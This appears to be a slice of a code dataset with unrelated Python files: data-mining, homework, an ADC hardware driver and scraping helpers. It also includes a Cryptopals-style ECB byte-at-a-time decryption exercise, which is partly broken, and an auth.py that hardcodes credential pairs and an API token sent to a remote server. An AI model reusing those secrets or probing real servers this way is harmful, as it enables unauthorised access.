0.8571428571428571,\n (2, 3): 0.5714285714285714,\n (2, 4): 0.42857142857142855,\n (3,): 0.7142857142857143,\n (3, 4): 0.42857142857142855,\n (4,): 0.5714285714285714}\n \"\"\"\n \n # get number of itemsets\n total_itemsets = len(data)\n\n # control size of subsets\n length = 0\n longest_itemset = max([len(itemset) for itemset in data])\n\n # initialize control of accepted subsets\n support = {}\n\n # initialize control of rejected subsets\n discards = []\n\n # stopping criteria - if a iteration is rejected completely, it's time to stop\n foundit = True\n\n while foundit and length <= longest_itemset:\n # increment size of subsets\n length += 1\n\n # generate subsets and remove not supported combinations\n items = set([combination\n for itemset in data\n for combination in itertools.combinations(itemset, length)\n if combination not in discards])\n\n # count subsets in data\n s = collections.Counter([item\n for item in items\n for itemset in data\n if itemset.issuperset(item)])\n\n # add subsets that have support and discard those don't have\n foundit = False\n for key, value in s.items():\n ratio = value / total_itemsets\n if ratio >= support_ratio:\n foundit = True\n support[key] = ratio\n else:\n discards += key\n\n return support\n","sub_path":"apriori.py","file_name":"apriori.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"269506960","text":"magicians = ['Alice', 'Markus', 'Salazar']\n\ndef show_magicians(mag_list):\n \"\"\"Выводим список фокусников\"\"\"\n for maician in mag_list:\n print(maician)\n\n\ndef make_great(mag_list):\n \"\"\"Делаем фокусника вновь великим\"\"\"\n inner_list=[]\n for i in 
range(len(mag_list)):\n inner_list.append(mag_list[i] + ' великий!')\n return inner_list\n\n\n\n\nshow_magicians(make_great(magicians))\nshow_magicians(magicians)","sub_path":"Lesson_9/Homework/magicians.py","file_name":"magicians.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"573647418","text":"import aes\nimport base64\nimport random\nfrom itertools import count\n\n\ndef encryption_oracle(key, rand, text, postfix):\n\n cipher = aes.ecb(key=key)\n postfix = base64.b64decode(postfix)\n cipherText = cipher.encrypt(rand + text + postfix)\n return cipherText\n\n\ndef random_bytes(n):\n return b''.join([bytes([random.randint(0, 255)]) for i in range(n)])\n\n\ndef overflow(i, postfix):\n return encryption_oracle(key, rand, b'a'*i, postfix)\n\n\ndef extract_suffix(blocks):\n for i, block in enumerate(blocks):\n if block == blocks[i-1]:\n return blocks[i+1:]\n\n\ndef iterate_bytes(block):\n if block is not None:\n for letter in range(1, 255):\n yield block + bytes([letter])\n\n\ndef find_byte(block, pad, n=16):\n cipher = encryptionOracle(pad, key)\n for tries in iterate_bytes(block):\n candidate = encryptionOracle(tries, key)[:n]\n if candidate == cipher[:n]:\n return tries\n\n\ndef decrypt_shit(max_lenght):\n solution = []\n for k in count():\n if k > max_lenght:\n break\n blocks = b'a'*(k-1)\n pad = blocks\n for i in range(len(blocks)):\n if find_byte(blocks, pad) is not None:\n try:\n blocks = find_byte(blocks, pad, k)\n blocks = blocks[1:]\n solution.append(blocks)\n pad = pad[1:]\n except:\n pass\n print(solution)\n\n\nkey = random_bytes(16)\nn = random.randint(1, 70)\nrand = random_bytes(n)\n\nif __name__ == '__main__':\n postfix = ('Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9'\n 'wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ'\n '2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHR'\n 'vIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c'\n '3QgZHJvdmUgYnkK')\n for i in count():\n buffered = overflow(i, postfix)\n blocks = [buffered[j: j+16] for j in range(0, len(buffered), 16)]\n if extract_suffix(blocks) is not None:\n cipher = b''.join(extract_suffix(blocks))\n break\n","sub_path":"ch14.py","file_name":"ch14.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"310013482","text":"# imports\ntry:\n from .modules import *\nexcept:\n from modules import *\n\ndatabase = \"data\"\n# Global variables\nmonths = [\"Jan\", \"Feb\", \"Mar\", \"Apr\", \"May\", \"Jun\", \"Jul\", \"Aug\", \"Sep\", \"Oct\", \"Nov\", \"Dec\"]\nmonth_count = len(months)\nlabels, rainfall = open_file(database)\nif not labels:\n labels =[]\nif not rainfall:\n rainfall = [[] for i in range(month_count)]\n\n\n# Functions\n\n\ndef main():\n\n while True:\n print(\"1. Input data\")\n if rainfall != [[] for i in range(month_count)]:\n print(\"2. Output Data\")\n print(\"3. Show graph\")\n print(\"0. 
Exit\")\n option = input(\">>\")\n if option == \"0\":\n close_and_save(database, labels, rainfall)\n elif option == \"1\":\n label_name = input(\"Label: \")\n labels.append(label_name)\n get_month_rainfall(months, rainfall, \"Rainfall\")\n elif option == \"2\":\n c = 0\n for i in labels:\n print(c, i)\n c += 1\n l = None\n while l not in range(len(labels)):\n l = int(input(\">\"))\n avrg, above_avrg = get_avrgs(rainfall, l)\n print(get_readable(months, rainfall, \"Rainfall\", l))\n print(\"There were %s months above the avrg of %s\" % (str(above_avrg), str(round(avrg, 2))))\n elif option == \"3\":\n c = 0\n for i in labels:\n print(c, i)\n c += 1\n l = None\n while l not in range(len(labels)):\n l = int(input(\">\"))\n draw_graph(months, [i[l] for i in rainfall])\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"rainStore.py","file_name":"rainStore.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"574371680","text":"# -*- coding: utf-8 -*-\nimport time\nfrom mix.driver.core.bus.axi4_lite_bus import AXI4LiteBus\n\n__author__ = 'jionghao.huang@SmartGiant'\n__version__ = '0.1'\n\n\nclass MIXADS8568SGDef:\n MODULE_STATUS = 0x10 # 1bit\n ADS8568_SEL_B = 0x11 # 1bit\n ADS8568_SEL_CD = 0x12 # 1bit\n ADC_SPI_RATE = 0x14 # 32bit\n SPI_NORMAL_DATA = 0x18 # 32bit\n DATA_LEN = 4\n ADC_CHANNEL_EN = 0x20 # 4bit\n CHANNEL_A_DATA = 0x24 # 32bit\n CHANNEL_B_DATA = 0x28 # 32bit\n CHANNEL_C_DATA = 0x2C # 32bit\n CHANNEL_D_DATA = 0x30 # 32bit\n\n STATUS = {'enable': 0x01, 'disable': 0x00}\n CHANNEL_PAIR = {'A': CHANNEL_A_DATA, 'B': CHANNEL_B_DATA, 'C': CHANNEL_C_DATA, 'D': CHANNEL_D_DATA}\n\n # Config register mask.\n INTERNAL_VREF_EN = 0x00001000\n INTERNAL_VREF_DIS = 0x00000000\n WR_RD_CONFIG_REG = 0xC0000000\n # Hardware mode related register.\n # Bit 30\n READ_EN_NORMAL = 0x00000000\n READ_EN_TWO_ACCESSES = 0x40000000\n # Bit 29\n CLKSEL_NORMAL = 0x00000000\n CLKSEL_EXTERNAL = 0x20000000\n # Bit 27\n BUSY_MODE = 0x00000000\n INTERRUPT_MODE = 0x08000000\n # Bit 26\n ACTIVE_HIGH = 0x00000000\n ACTIVE_LOW = 0x04000000\n # Bit 22\n PD_B_NORMAL = 0x00000000\n PD_B_POWER_DOWN = 0x00400000\n # Bit 20\n PD_C_NORMAL = 0x00000000\n PD_C_POWER_DOWN = 0x00100000\n # Bit 18\n PD_D_NORMAL = 0x00000000\n PD_D_POWER_DOWN = 0x00040000\n # Bit 13\n VREF_2500_MV = 0x00000000\n VREF_3000_MV = 0x00002000\n\n POSITIVE_FULL_SCALE = 0x7FFF\n\n DEV_FUNC_MODE = {'sw': 0, 'hw': 1}\n CHANNEL = {1: 'A', 2: 'A', 3: 'B', 4: 'B', 5: 'C', 6: 'C', 7: 'D', 8: 'D'}\n HW_ABSOLUTE_VOLT_RANGE = {'4VREF': 0, '2VREF': 1}\n SW_ABSOLUTE_VOLT_RANGE = {\n 'A': {'4VREF': 0, '2VREF': 0x01000000},\n 'B': {'4VREF': 0, '2VREF': 0x00800000},\n 'C': {'4VREF': 0, '2VREF': 0x00200000},\n 'D': {'4VREF': 0, '2VREF': 0x00080000}\n }\n MAX_VREF_OUTPUT_RANGE = {2.5: VREF_2500_MV, 3: VREF_3000_MV}\n\n CH_MIN = 1\n CH_MAX = 8\n\n\nclass MIXADS8568SG(object):\n '''\n MIXADS8568SG is the ipcore of chip ads8568.\n\n '''\n\n def __init__(self, axi4_bus, convst_a=None, convst_b=None, convst_c=None, convst_d=None,\n busy=None, xclk=None, hw_sw_sel=None, ref_sel=None, stby=None, reset=None,\n cs=None, refbuf_en=None, asleep_sel=None, ser_sel=None, sel_cd=None, sel_b=None):\n self.axi4_bus = axi4_bus\n self.convst_a = convst_a\n self.convst_b = convst_b\n self.convst_c = convst_c\n self.convst_d = convst_d\n self.busy = busy\n self.xclk = xclk\n self.hw_sw_sel = hw_sw_sel\n self.ref_sel = ref_sel\n self.stby = stby\n self.reset = reset\n self.cs = cs\n 
self.refbuf_en = refbuf_en\n self.asleep_sel = asleep_sel\n self.ser_sel = ser_sel\n self.sel_cd = sel_cd\n self.sel_b = sel_b\n\n self.dev_func_mode = 'hw'\n self.max_vref_range = 2.5\n self.input_volt_range = 4 * self.max_vref_range\n self.current_config_data = 0x000003FF\n\n def ctrl_dev(self, status):\n '''\n MIXADS8568SG control device.\n\n Args:\n status: string, ['enable', 'disable'], device status.\n\n Examples:\n mixads8568sg.ctrl_dev('enable')\n\n '''\n assert status in MIXADS8568SGDef.STATUS\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.MODULE_STATUS, [MIXADS8568SGDef.STATUS[status]])\n\n def write_config_register(self, wr_data):\n '''\n MIXADS8568SG wirte config register.(0nly effective in sw mode.)\n\n Args:\n wr_data: int, [0x0 ~ 0xFFFFFFFF], data to write.\n\n Examples:\n mixads8568sg.write_config_register(0xC00003FF)\n\n '''\n assert isinstance(wr_data, int)\n assert 0x00000000 <= wr_data <= 0xFFFFFFFF\n\n self.axi4_bus.write_32bit_inc(MIXADS8568SGDef.SPI_NORMAL_DATA, [wr_data])\n\n def read_config_register(self):\n '''\n MIXADS8568SG read config register.(0nly effective in sw mode.)\n\n Examples:\n mixads8568sg.read_config_register()\n\n '''\n # Need debug.\n wr_data = MIXADS8568SGDef.WR_RD_CONFIG_REG | self.current_config_data\n self.write_config_register(wr_data)\n self.start_conv('A')\n # time.sleep(0.001)\n rd_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.SPI_NORMAL_DATA, MIXADS8568SGDef.DATA_LEN)\n\n return rd_data[0]\n\n def sel_b_ch(self, status):\n '''\n MIXADS8568SG select channel pair B.\n\n Args:\n status: string, ['enable', 'disable'], channel status.\n\n Examples:\n mixads8568sg.sel_b_ch('enable')\n\n '''\n assert status in MIXADS8568SGDef.STATUS\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.ADS8568_SEL_B, [MIXADS8568SGDef.STATUS[status]])\n\n def sel_cd_ch(self, status):\n '''\n MIXADS8568SG select channel pair C and D.\n\n Args:\n status: string, ['enable', 'disable'], channel status.\n\n Examples:\n mixads8568sg.sel_cd_ch('enable')\n\n '''\n assert status in MIXADS8568SGDef.STATUS\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.ADS8568_SEL_CD, [MIXADS8568SGDef.STATUS[status]])\n\n def set_spi_speed(self, speed):\n '''\n MIXADS8568SG set spi bus clock speed.\n\n Args:\n speed: int, [1 ~ 20000000], unit Hz, 1000000 means 1000000Hz.\n\n Examples:\n mixads8568sg.set_spi_speed(10000000)\n\n '''\n assert 1 <= speed <= 20000000\n\n wr_data = (pow(2, 32) * 8 * speed) / 1000000000\n self.axi4_bus.write_32bit_inc(MIXADS8568SGDef.ADS8568_SEL_CD, [wr_data])\n\n def adc_ch_pair_en(self, count):\n '''\n MIXADS8568SG set spi bus clock speed.\n\n Args:\n count: int, [1 ~ 4], unit Hz, 1000000 means 1000000Hz.\n\n Examples:\n mixads8568sg.adc_ch_pair_en(4)\n\n '''\n assert 1 <= count <= 4\n\n self.axi4_bus.write_8bit_inc(MIXADS8568SGDef.ADC_CHANNEL_EN, [count])\n\n def read_single_ch_data(self, ch_pair):\n '''\n MIXADS8568SG set spi bus clock speed.\n\n Args:\n ch_pair: int, ['A', 'B', 'C', 'D'], channel pair.\n\n Returns:\n rd_data, int.\n\n Examples:\n mixads8568sg.read_single_ch_data('A')\n\n '''\n assert ch_pair in MIXADS8568SGDef.CHANNEL_PAIR\n\n rd_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_PAIR[ch_pair], MIXADS8568SGDef.DATA_LEN)\n return rd_data[0]\n\n def read_all_ch_data(self):\n '''\n MIXADS8568SG read all channels data.\n\n Returns:\n rd_data, list.\n\n Examples:\n mixads8568sg.read_all_ch_data()\n\n '''\n ch_a_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_A_DATA, MIXADS8568SGDef.DATA_LEN)\n ch_b_data = 
self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_B_DATA, MIXADS8568SGDef.DATA_LEN)\n ch_c_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_C_DATA, MIXADS8568SGDef.DATA_LEN)\n ch_d_data = self.axi4_bus.read_32bit_inc(MIXADS8568SGDef.CHANNEL_D_DATA, MIXADS8568SGDef.DATA_LEN)\n return ch_a_data[0] + ch_b_data[0] + ch_c_data[0] + ch_d_data[0]\n\n def sel_mode(self, dev_func_mode='hw'):\n '''\n MIXADS8568SG select device functional mode.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device functional mode.\n\n Examples:\n mixads8568sg.sel_mode('hw')\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n\n self.hw_sw_sel.set_level(MIXADS8568SGDef.DEV_FUNC_MODE[dev_func_mode])\n\n def init_pins(self):\n '''\n MIXADS8568SG init pins.\n\n Examples:\n mixads8568sg.init_pins()\n\n '''\n self.convst_a.set_dir('output')\n self.convst_b.set_dir('output')\n self.convst_c.set_dir('output')\n self.convst_d.set_dir('output')\n self.xclk.set_dir('output')\n self.hw_sw_sel.set_dir('output')\n self.ref_sel.set_dir('output')\n self.stby.set_dir('output')\n self.reset.set_dir('output')\n self.cs.set_dir('output')\n self.refbuf_en.set_dir('output')\n self.asleep_sel.set_dir('output')\n self.ser_sel.set_dir('output')\n self.sel_cd.set_dir('output')\n self.sel_b.set_dir('output')\n self.busy.set_dir('input')\n\n def reset_dev(self):\n '''\n MIXADS8568SG reset, active high. This pin aborts any ongoing conversions and resets the internal\n configuration register(CONFIG) to 000003FFh.A valid reset pulse must be at least 50 ns long.\n\n Examples:\n mixads8568sg.reset_dev()\n\n '''\n self.reset.set_level(0)\n time.sleep(0.001)\n self.reset.set_level(1)\n time.sleep(0.001)\n self.reset.set_level(0)\n\n def init_dev(self, dev_func_mode):\n '''\n MIXADS8568SG init device.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device functional mode.\n\n Examples:\n mixads8568sg.init_dev()\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n\n self.sel_mode(dev_func_mode)\n self.init_pins()\n self.reset_dev()\n # Enable FPGA IP.\n self.ctrl_dev('enable')\n\n def sel_max_vref_output_range(self, max_vref_range=2.5):\n '''\n MIXADS8568SG set maximum reference voltage output range.\n\n Args:\n max_vref_range: int, [2.5, 3]V, maximum reference voltage output range.\n\n Examples:\n mixads8568sg.sel_max_vref_output_range(3)\n\n '''\n assert max_vref_range in MIXADS8568SGDef.MAX_VREF_OUTPUT_RANGE\n\n range_mask = MIXADS8568SGDef.MAX_VREF_OUTPUT_RANGE[max_vref_range]\n rd_data = self.read_config_register()\n wr_data = rd_data | range_mask\n self.write_config_register(wr_data)\n self.max_vref_range = max_vref_range\n\n def set_absolute_volt_range(self, dev_func_mode, vrange, ch_pair='A'):\n '''\n MIXADS8568SG set absolute volt range.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device function mode.\n vrange: string, ['4VREF', '2VREF'], volt range.\n ch_pair: string, ['A', 'B', 'C', 'D'], channel pair.\n\n Examples:\n mixads8568sg.set_absolute_volt_range('hw', '2VREF')\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n assert vrange in MIXADS8568SGDef.HW_ABSOLUTE_VOLT_RANGE\n assert ch_pair in MIXADS8568SGDef.SW_ABSOLUTE_VOLT_RANGE\n\n self.input_volt_range = 4 * self.max_vref_range if '4VREF' == vrange else 2 * self.max_vref_range\n if 'hw' == dev_func_mode:\n self.xclk.set_level(MIXADS8568SGDef.HW_ABSOLUTE_VOLT_RANGE[vrange])\n else:\n rd_data = self.read_config_register()\n wr_data = rd_data | MIXADS8568SGDef.SW_ABSOLUTE_VOLT_RANGE[ch_pair][vrange]\n 
self.write_config_register(wr_data)\n\n def set_inter_vref(self, dev_func_mode, internal_ref_volt):\n '''\n MIXADS8568SG set internal reference voltage.\n\n Args:\n dev_func_mode: string, ['sw', 'hw'], device function mode.\n internal_ref_volt: float, [0.5V~3.0] unit V, internal reference voltage.\n\n Examples:\n mixads8568sg.set_internal_ref_volt(3.0)\n\n '''\n assert dev_func_mode in MIXADS8568SGDef.DEV_FUNC_MODE\n assert 0.5 <= internal_ref_volt <= 3.0\n\n code = (1024 * internal_ref_volt) / self.max_vref_range - 1\n rd_data = self.read_config_register()\n wr_data = rd_data | code\n self.write_config_register(wr_data)\n\n if 'hw' == dev_func_mode:\n # Internal reference enable in hw mode.\n self.ref_sel.set_level(1)\n else:\n # Internal reference enable in sw mode.\n wr_data |= MIXADS8568SGDef.INTERNAL_VREF_EN\n self.write_config_register(wr_data)\n\n def start_conv(self, ch_pair):\n '''\n MIXADS8568SG start converting, active high.\n\n Args:\n ch_pair: string, ['A', 'B', 'C', 'D'], channel pair.\n\n Examples:\n ads8568.start_conv('A')\n\n '''\n channel = {'A': self.convst_a, 'B': self.convst_b,\n 'C': self.convst_c, 'D': self.convst_d}\n assert ch_pair in channel\n\n channel[ch_pair].set_level(0)\n time.sleep(0.001)\n channel[ch_pair].set_level(1)\n time.sleep(0.001)\n channel[ch_pair].set_level(0)\n\n def _code_2_mvolt(self, code):\n '''\n MIXADS8568SG translate the code value to voltage value.\n\n Args:\n code: int, code value.\n\n Examples:\n ads8568._code_2_mvolt(0x1234)\n\n '''\n # assert 0 <= code <= 0xFFFF\n\n # When Singular channel number.\n # if (0 <= code <= 0x7FFF):\n # volt0 = (((code >> 16) & 0x0000FFFF) / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n # # When dual channel number\n # volt1 = (code & 0x0000FFFF) * MIXADS8568SGDef.POSITIVE_FULL_SCALE * self.input_volt_range\n # elif (0x8000 <= code <= 0xFFFF):\n # volt0 = -(((code >> 16) & 0x0000FFFF) / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n # # When dual channel number\n # volt1 = -(code & 0x0000FFFF) * MIXADS8568SGDef.POSITIVE_FULL_SCALE * self.input_volt_range\n assert 0 <= code <= 0xFFFFFFFF\n\n code0 = (((code >> 16) & 0x0000FFFF))\n code1 = (code & 0x0000FFFF)\n if (0 <= code0 <= 0x7FFF):\n volt0 = (code0 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n elif (0x8000 <= code0 <= 0xFFFF):\n volt0 = -(code0 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n\n if (0 <= code1 <= 0x7FFF):\n volt1 = (code1 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n elif (0x8000 <= code1 <= 0xFFFF):\n volt1 = -(code1 / MIXADS8568SGDef.POSITIVE_FULL_SCALE) * self.input_volt_range\n\n return [volt0, volt1]\n\n # def ads8568_read_ch(self, ch, range, mode, polarity):\n\n def read_ch(self, ch):\n '''\n MIXADS8568SG read single channel.\n\n Args:\n ch: int, [1~8], channel.\n\n Returns:\n volt, float, volt value.\n\n Examples:\n ads8568.read_ch(2)\n '''\n assert ch in MIXADS8568SGDef.CHANNEL\n\n # Channel one-to-one correspondence.\n self.sel_cd.set_level(1)\n self.sel_cd_ch('enable')\n self.sel_b.set_level(1)\n self.sel_b_ch('enable')\n\n # Conversion start\n self.start_conv(MIXADS8568SGDef.CHANNEL[ch])\n time.sleep(0.001)\n while self.busy.get_level():\n pass\n self.adc_ch_pair_en(1)\n # Get volt.\n # Call spi bus read api with corresponding pin.\n code = self.read_single_ch_data(MIXADS8568SGDef.CHANNEL[ch])\n rd_data = self._code_2_mvolt(code)\n volt = rd_data[0] if (ch % 2) != 0 else rd_data[1]\n\n return volt\n\n def scan_ch(self, ch_list):\n '''\n 
MIXADS8568SG read multiple channel.\n\n Args:\n ch_list: list, [1~8], list of channel.\n\n Returns:\n volt, list, volt value.\n\n Examples:\n ads8568.scan_ch([1, 2 ,5, 8])\n '''\n assert isinstance(ch_list, list)\n for x in range(len(ch_list)):\n assert ch_list[x] in MIXADS8568SGDef.CHANNEL\n\n # Channel one-to-one correspondence.\n self.sel_cd.set_level(1)\n self.sel_cd_ch('enable')\n self.sel_b.set_level(1)\n self.sel_b_ch('enable')\n\n tmp = []\n # A conversion start must not be issued during an ongoing conversion on the corresponding channel pair.\n # Get whole channel pair.\n for i in range(len(ch_list)):\n tmp.append(MIXADS8568SGDef.CHANNEL[ch_list[i]])\n # Remove duplicate channel pair.\n ch_pair = set(tmp)\n for ch in ch_pair:\n self.start_conv(ch)\n # self.start_conv(MIXADS8568SGDef.CHANNEL[ch])\n time.sleep(0.001)\n # Wait for conversion.\n while self.busy.get_level():\n pass\n self.adc_ch_pair_en(4)\n # Get volt.\n result_list = []\n for i in range(len(ch_list)):\n code = self.read_single_ch_data(ch_list[i])\n rd_data = self._code_2_mvolt(code)\n if 'A' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 1 == ch_list[i]:\n volt_ch1 = rd_data[0]\n result_list.append(volt_ch1)\n elif 2 == ch_list[i]:\n volt_ch2 = rd_data[1]\n result_list.append(volt_ch2)\n elif 'B' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 3 == ch_list[i]:\n volt_ch3 = rd_data[0]\n result_list.append(volt_ch3)\n elif 4 == ch_list[i]:\n volt_ch4 = rd_data[0]\n result_list.append(volt_ch4)\n elif 'C' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 5 == ch_list[i]:\n volt_ch5 = rd_data[0]\n result_list.append(volt_ch5)\n elif 6 == ch_list[i]:\n volt_ch6 = rd_data[0]\n result_list.append(volt_ch6)\n elif 'D' == MIXADS8568SGDef.CHANNEL[ch_list[i]]:\n if 7 == ch_list[i]:\n volt_ch7 = rd_data[0]\n result_list.append(volt_ch7)\n elif 8 == ch_list[i]:\n volt_ch8 = rd_data[0]\n result_list.append(volt_ch8)\n\n return result_list\n","sub_path":"mix_ads8568_sg.py","file_name":"mix_ads8568_sg.py","file_ext":"py","file_size_in_byte":17888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"591747908","text":"import json\nimport requests\nimport base64\n\nfrom django.core.mail import send_mail\n\nheaders = {'Authorization': 'Basic YWxsYWRpbjpvcGVuc2VzYW1l'}\nresponse = requests.post('http://79.137.175.13/submissions/1/', headers=headers)\n\npwd = base64.b64encode(b'galchonok:ktotama')\nheaders = {'Authorization': f'Basic {pwd.decode()}'}\n#funny:world\n#admin:world\n#response = requests.put('http://79.137.175.13/submissions/super/duper/secret/', headers=headers)\n#print(json.loads(response.content.decode('utf-8')))\n\n#curl -v -H \"Content-Type: application/json\" \"Authorization: Basic asdafasfasf\" -X POST -d '{\"title\":\"Сыр российский\", \"description\":\"очень вкусный сыр\", \"price\":\"1tp://127.0.0.1:8000/api/v1/goods/\n\n#headers = {'Content-Type': 'application/json', 'Authorization': 'Basic YWxsYWRpbjpvcGVuc2VzYW1l'}\n\n#pwd = base64.b64encode(b'funny:world')\n#headers = {'Content-Type': 'application/json', 'Content-Encoding': 'utf-8','Authorization': 'Basic {}'.format(pwd.decode())}\n#params = {\"title\": \"asdasd\", \"description\":\"asdasd\",\"price\":\"10\"}\n#response = requests.post('http://127.0.0.1:8000/api/v1/goods/', data = json.dumps(params), headers=headers)\n\n#key = base64.b64decode(pwd)\n#print(response)\n\nTOKEN_API = 'f60671e7408e521407d3545f6a35948afbf135fa54bf580ff66159f3bee81a4d'\nheaders = {'Content-Type': 'application/json', 'Content-Encoding': 
'utf-8','Authorization': f'Bearer {TOKEN_API}'}\n\n#response = requests.get('http://smarthome.t3st.ru/api/auth.current', headers=headers)\n#print(response.json())\n\n#response = requests.get('http://smarthome.t3st.ru/api/user.controller', headers=headers)\n\n#data = response.json()\n\ndef send_email():\n send_mail(\n 'Smart house. Alert',\n 'Ahtung! There is a problem in you flat',\n 'pvv@mail.ru',\n ['pvv@mail.ru'],\n fail_silently=False,\n )\nclass controller():\n def __init__(self, name, value):\n self = {\"name\":name,\"value\":value }\n\n def get(self):\n return self\n\nparams = {}\nparams[\"controllers\"] = []\n\nparams[\"controllers\"].append({\"name\":\"air_conditioner\", \"value\":\"true\"})\nparams[\"controllers\"].append({\"name\":\"leak_detector\", \"value\":\"true\"})\n\n#response = requests.post('http://smarthome.t3st.ru/api/user.controller', data = json.dumps(params), headers=headers)\n\nprint(send_email)\n#print(response.text)\n","sub_path":"auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"69822829","text":"import string\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef get_h1_tag(html):\n '''\n This function takes as input a string containing html.\n It searches the html for the h1 tag,\n and returns the contents of the h1 tag.\n HINT: Use BeautifulSoup\n >>> get_h1_tag('
<h1>example</h1>')\n    'example'\n    >>> get_h1_tag('<html><body><h1>example</h1></body></html>')\n    'example'\n    '''\n    bs=BeautifulSoup(html, \"html.parser\")\n    return bs.find('h1').text\n    \n\ndef download_html(url):\n    '''\n    This function takes a url as input and returns the html associated with\n    the url.\n    WARNING:\n    The doctests for this function rely on both the download_html and get_h1_tag\n    functions.\n    Therefore, these doctests cannot pass until both functions are correctly\n    implemented.\n    Ideally, we would never have the doctests of a function depend on other\n    functions also working correctly,\n    but for some functions that have particularly complicated output,\n    this is unavoidable.\n    HINT: use the requests library to implement this function\n    >>> get_h1_tag(download_html('https://en.wikipedia.org/wiki/Laika'))\n    'Laika'\n    '''\n    webpage = requests.get(url).text\n    return webpage\n\ndef get_p_contents(html):\n    r'''\n    This function takes as input a string containing html. \n    It searches the html for all p tags,\n    and returns the contents of all p tags concatenated into a single string.\n    The newline character should be placed between the contents of all p tags.\n    HINT: use BeautifulSoup\n    >>> get_p_contents('<p>example</p>')\n    'example'\n    >>> get_p_contents('<html><body><p>example</p></body></html>')\n    'example'\n    >>> get_p_contents('<p>example</p><div>blah blah blah</div><p>example</p>
')\n 'example\\nexample'\n '''\n bs=BeautifulSoup(html)\n contents = ''\n for a in bs.find_all('p'):\n contents += a.text\n contents += '\\n'\n edited = contents[0:(len(contents)-1)]\n return edited\n\n\ndef remove_punctuation(text):\n '''\n This function takes as input text and returns a modified version of the string \n with all punctuation characters removed.\n >>> remove_punctuation('U.S.A.')\n 'USA'\n >>> remove_punctuation('My advice: (1) get bigger; (2) get badder; (3) get ugly!')\n 'My advice 1 get bigger 2 get badder 3 get ugly'\n >>> remove_punctuation(string.punctuation)\n ''\n '''\n import string\n table = str.maketrans(dict.fromkeys(string.punctuation))\n new_s = text.translate(table)\n return new_s\n\ndef remove_numbers(text):\n from string import digits\n '''\n This function takes as input text and returns a modified version of the string \n with all numbers removed.\n The function only removes arabic numerals, and does not remove spelled-out numbers.\n >>> remove_numbers('1234567890')\n ''\n >>> remove_numbers('one')\n 'one'\n >>> remove_numbers('MMXIX')\n 'MMXIX'\n >>> remove_numbers('p4ssw0rd')\n 'psswrd'\n '''\n final = ''.join([i for i in text if not i.isdigit()])\n return final\n\ndef remove_newlines(text):\n r'''\n This function takes as input text and returns a modified version of the string \n with all newline characters '\\n' replaced with a space ' '.\n >>> remove_newlines('this\\nis\\na\\ntest')\n 'this is a test'\n '''\n text = text.replace('\\n',' ')\n return text\n\nstop_words=['','i','me','my','myself','we','our','ours','ourselves','you','your','yours','yourself','yourselves','he','him','his','himself','she','her','hers','herself','it','its','itself','they','them','their','theirs','themselves','what','which','who','whom','this','that','these','those','am','is','are','was','were','be','been','being','have','has','had','having','do','does','did','doing','a','an','the','and','but','if','or','because','as','until','while','of','at','by','for','with','about','against','between','into','through','during','before','after','above','below','to','from','up','down','in','out','on','off','over','under','again','further','then','once','here','there','when','where','why','how','all','any','both','each','few','more','most','other','some','such','no','nor','not','only','own','same','so','than','too','very','s','t','can','will','just','don','should','now','could','would','how','many']\n\ndef remove_stop_words(text):\n '''\n This function takes as input text and returns a modified version of the string \n with all stop words removed.\n Stop words are simple English words that appear very often in text no matter\n what the subject is,\n and so they would look like noise in our analysis.\n >>> remove_stop_words('How much wood would a woodchuck chuck if a woodchuck could chuck wood?')\n 'much wood woodchuck chuck woodchuck chuck wood?'\n >>> remove_stop_words('If Peter Piper picked a peck of pickled peppers, how many pickled peppers did Peter Piper pick?')\n 'Peter Piper picked peck pickled peppers, pickled peppers Peter Piper pick?'\n '''\n words = text.split()\n result = ''\n i=0\n while i < len(words):\n if words[i].lower() not in stop_words:\n if i == (len(words) - 1):\n result += words[i]\n else:\n result += (words[i] + ' ')\n i += 1\n return result\n\ndef count_words(text):\n '''\n This function takes as input a string and returns a dictionary.\n The keys in the 